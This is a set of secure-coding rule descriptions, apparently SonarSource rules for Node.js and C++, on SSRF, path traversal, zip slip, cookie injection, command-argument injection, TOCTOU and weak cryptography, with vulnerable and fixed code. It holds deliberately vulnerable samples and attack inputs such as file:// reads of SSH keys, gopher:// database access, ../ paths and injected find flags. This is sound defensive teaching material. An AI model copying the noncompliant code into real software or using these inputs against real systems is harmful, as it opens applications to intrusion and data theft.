Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internally accessible ports on the affected server, or on other hosts the server can reach, by iterating over the port field in the URL http://127.0.0.1:{port}.
By taking advantage of other URL schemes supported by the affected system, for example gopher://127.0.0.1:3306, an attacker can connect to a database service and perform queries on it.

How to fix it in Node.js

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

const axios = require('axios');
const express = require('express');

const app = express();

app.get('/example', async (req, res) => {
    try {
        await axios.get(req.query.url); // Noncompliant
        res.send("OK");
    } catch (err) {
        console.error(err);
        res.send("ERROR");
    }
})

Compliant solution

const axios = require('axios');
const express = require('express');

const app = express();

const schemesList = ["http:", "https:"];
const domainsList = ["trusted1.example.com", "trusted2.example.com"];

app.get('/example', async (req, res) => {
    const url = new URL(req.query.url);

    if (schemesList.includes(url.protocol) && domainsList.includes(url.hostname)) {
        try {
            await axios.get(url.href);
            res.send("OK");
        } catch (err) {
            console.error(err);
            res.send("ERROR");
        }
    } else {
        res.send("INVALID_URL");
    }
})

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com"), or an equivalent regex such as ^https://example\.com.*, can be bypassed with the URL https://example.commit.malicious.io.
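The bypass is easy to reproduce with Node's built-in URL class (no extra dependencies; the host names are illustrative):

```javascript
// A prefix check without a trailing separator accepts lookalike hosts.
const trusted = "https://example.com";
const malicious = "https://example.commit.malicious.io";

console.log(malicious.startsWith(trusted)); // true: validation bypassed

// Parsing the URL and comparing the exact hostname closes the gap.
const { hostname } = new URL(malicious);
console.log(hostname);                   // "example.commit.malicious.io"
console.log(hostname === "example.com"); // false: request is rejected
```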

Resources

Standards

tssecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Node.js

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' }); // Noncompliant
}

Compliant solution

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const joinedPath = path.join(targetDirectory, req.query.filename);
  const canonicalPath = fs.realpathSync(joinedPath);

  if (!canonicalPath.startsWith(targetDirectory)) {
    return res.status(401).send();
  }

  let data = fs.readFileSync(canonicalPath, { encoding: 'utf8', flag: 'r' });
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like fs.realpathSync. This resolves relative path components like ../ and removes any ambiguity regarding the file's location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources";
  const joinedPath = path.join(targetDirectory, req.query.filename);
  const canonicalPath = fs.realpathSync(joinedPath);

  if (!canonicalPath.startsWith(targetDirectory)) {
    return res.status(401).send();
  }

  let data = fs.readFileSync(canonicalPath);
}

This check can be bypassed because, for example, "/data/app/resources-evil".startsWith("/data/app/resources") returns true. Thus, for validation, "/data/app/resources" should actually be "/data/app/resources/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Do not use path.resolve as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

tssecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these cookies enables control over the identity of users within the application.

The injection might occur via a GET parameter, with the payload (for example, https://example.com?cookie=injectedcookie) delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim enters sensitive data within the attacker's application session, which the attacker can later retrieve. The implications vary depending on the type of data disclosed: leaking strictly confidential user data has a different impact than leaking organizational data.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie under their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker's session and is affected by the XSS, which can then be used for a wide range of attacks, including credential stealing using mirrored login pages.

How to fix it in Express.js

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        const cookie = req.query.cookie;
        res.cookie("connect.sid", cookie); // Noncompliant
    }

    return res.redirect("/welcome");
});

Compliant solution

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        return res.redirect("/getcookie");
    }

    return res.redirect("/welcome");
});

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

tssecurity:S6350

Constructing arguments of system commands from user input is security-sensitive and has led to vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).
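The type-cast recommendation above can be sketched as follows; parseDepth is a hypothetical helper that validates a user-supplied argument as a plain positive integer before it can reach a command line, so flag-like arguments such as "-delete" are impossible by construction.

```javascript
// Sketch: accept only a short run of digits; anything else (flags,
// shell metacharacters, negative numbers) is rejected outright.
function parseDepth(input) {
  if (!/^\d{1,4}$/.test(String(input))) {
    throw new Error("invalid depth argument");
  }
  return String(parseInt(input, 10));
}

console.log(parseDepth("3")); // safe to pass to spawn() as an argument
try {
  parseDepth("-delete");      // flag injection attempt is rejected
} catch (e) {
  console.log(e.message);
}
```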

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

const { spawn } = require("child_process");
const input = req.query.input;
const proc = spawn("/usr/bin/find", [input]); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

const { spawn } = require("child_process");
const input = req.query.input;
if (allowed.includes(input)) {
  const proc = spawn("/usr/bin/find", [input]);
}

See

tssecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive they control.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Node.js

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

const AdmZip = require("adm-zip");
const fs = require("fs");
const multer = require("multer");

const upload = multer();

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        var writer = fs.createWriteStream(zipEntry.entryName); // Noncompliant
        writer.write(zipEntry.getData().toString("utf8"));
    });
});

Compliant solution

const AdmZip = require("adm-zip");
const fs = require("fs");
const path = require("path");
const multer = require("multer");

const upload = multer();
const unzipTargetDir = "/example/directory/";

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        const canonicalPath = path.normalize(unzipTargetDir + zipEntry.entryName);
        if (canonicalPath.startsWith(unzipTargetDir)) {
            let writer = fs.createWriteStream(canonicalPath);
            writer.write(zipEntry.getData().toString("utf8"));
        }
    });
});

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follows:

  1. Resolve the canonical path of the file by using methods like path.join or path.normalize. This resolves relative path components like ../ and removes any ambiguity regarding the file's location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string variable targetDirectory does not end with a path separator:

const AdmZip = require("adm-zip");
const fs = require("fs");
const path = require("path");

const targetDirectory = "/Users/John";

app.get('/example', (req, res) => {
    const canonicalPath = path.normalize(targetDirectory + req.query.filename);

    if (canonicalPath.startsWith(targetDirectory)) {
        const zip = new AdmZip(canonicalPath);
        const zipEntries = zip.getEntries();

        zipEntries.forEach(function (zipEntry) {
            var writer = fs.createWriteStream(zipEntry.entryName);
            writer.write(zipEntry.getData().toString("utf8"));
        });
    }
});

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.


Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

cpp:S5982

The purpose of changing the current working directory is to modify the base path used when the process resolves relative paths. When the working directory cannot be changed, the process keeps the directory previously defined as the active working directory. Thus, verifying that chdir()-type functions succeed is important to prevent unintended relative path resolution and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail, leaving the process with access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

int fd = open(root_dir, O_RDONLY | O_DIRECTORY);
if (fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

cpp:S5832

Why is this an issue?

Pluggable Authentication Modules (PAM) is a mechanism used on many Unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired, etc.); otherwise, it can lead to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

cpp:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume that the state of the file is unchanged between these two steps: there is a race condition (i.e., two different processes can access and modify the same shared object/file at the same time), which can lead to privilege escalation, denial of service, and other unexpected results.

For instance, attackers can take advantage of this situation by creating a symbolic link to a sensitive file (e.g., /etc/passwd on Unix) right after the first step and trying to elevate their privileges (e.g., if the written data has the correct /etc/passwd file format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check function" (for instance access or stat; in this case access, used to verify the existence of a file) is followed by a "use function" (open, fopen, etc.) that writes data into a nonexistent file. These two consecutive calls create a TOCTOU race condition:

#include <errno.h>
#include <stdio.h>
#include <unistd.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exists between the access() call and the fopen() call
    if (NULL == f) {
      /* Handle error */
      return;
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on the disk, fopen with x mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant: the "x" mode (C11) makes fopen fail if the file already exists
  if (NULL == f) {
    /* Handle error */
    return;
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

#include <fcntl.h>
#include <stdio.h>

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY, 0600); // the mode argument is required with O_CREAT
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w"); // Compliant
    /* Write to file, then fclose(f) */
  }
}

Resources

cpp:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To an untrusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with the superuser (root), so make sure that only the most restrictive set of necessary capabilities is assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: direct use is discouraged because it is a raw system call

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

cpp:S5547

This vulnerability makes it possible for the cleartext of the encrypted message to be recovered without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

cpp:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations either use no padding at all or use the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

cpp:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These out-of-bounds accesses cause some of the most damaging and hard-to-track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);

Exceptions

Functions related to sockets using the type socklen_t are not checked. These functions follow a C-style polymorphic pattern based on unions, which deliberately mismatches the allocated memory and the declared structure sizes and would therefore create false positives.

Resources

cpp:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

The following code samples attempt to create an HTTP request.

Noncompliant code example

This sample uses cURL’s default TLS settings, which still allow the weak protocol versions TLSv1.0 and TLSv1.1.

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();                                      // Noncompliant
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");

    curl_easy_perform(curl);
}

Compliant solution

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    curl_easy_setopt(curl, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2);

    curl_easy_perform(curl);
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework in use is outdated: its TLS v1.2 settings may still enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

cpp:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithmic (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
